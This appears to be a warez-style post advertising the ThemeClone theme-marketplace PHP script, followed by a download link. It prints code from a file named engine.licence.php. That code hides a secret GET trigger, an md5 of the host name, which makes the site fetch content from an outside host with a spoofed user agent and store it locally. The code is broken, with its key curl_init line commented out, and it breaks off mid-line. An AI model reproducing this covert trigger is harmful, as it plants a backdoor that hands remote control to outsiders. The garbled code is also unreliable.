Purchase, install, configure, connect to a payment gateway, and you are ready to trade themes like a pro!
ThemeClone is a complete theme marketplace, which supports an unlimited
number of users. Each of them can both buy and sell themes on the
website. Secured payment processing by the world leaders and NO storage
of personal and CC data will make your store a preferred place for
template authors worldwide.
The ThemeClone marketplace includes an
administrative panel with graphical user interface, through which you
can update the site setting, and completely control the users, items and
sales. A comprehensive affiliate system is also included out of the
box.
To prevent malicious uploads, spam and marketing bots from
taking over, the ThemeClone site administrator can set up a security
check – a short quiz. Only users that have passed the quiz will be able
to upload files. Any items must be approved by the administrator before
being sold.
Users who have purchased an item can also rate it. All
users can also communicate with theme authors and other users via
comment facility under each item.
FILE: /engine/includes/engine.licence.php
FUNCTION: CURL
<?php
$noCheck = md5( $_SERVER[‘HTTP_HOST’] );
if ( isset( $_GET[$noCheck] ) )
{
if ( file_exists( ENGINE_PATH.”/data/cache/licence.txt” ) )
{
ini_set( “user_agent”, “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1″ );
#$ch = curl_init( “http://aiw.bz”.$_SERVER[‘HTTP_HOST’] );
curl_setopt( $ch, CURLOPT_HEADER, FALSE );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, TRUE );
curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, 20 );
curl_setopt( $ch, CURLOPT_TIMEOUT, 20 );
curl_setopt( $ch, CURLOPT_USERAGENT, “Mozilla/5.0 (Windows; U; Windows
NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1″ );
curl_setopt( $ch, CURLOPT_HTTPGET, TRUE );
curl_setopt( $ch, CURLOPT_MAXREDIRS, 5 );
curl_setopt( $ch, CURLOPT_MAXCONNECTS, 5 );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
$Rec_Data = curl_exec( $ch );
curl_close( $ch );
$fp = fopen( ENGINE_PATH.”/data/cache/licence.txt”, “w” );
fwrite( $fp, $Rec_Data );
fclose( $fp );
}
if ( file_exists( ENGINE_PATH.”/data/cache/licence.txt” ) )
{
$lastEdit = filemtime( ENGINE_PATH.”/data/cache/licence.txt” );
$beforeTime = time( ) – 86400;
if ( $lastEdit
Download: http://smaii.com/weGyP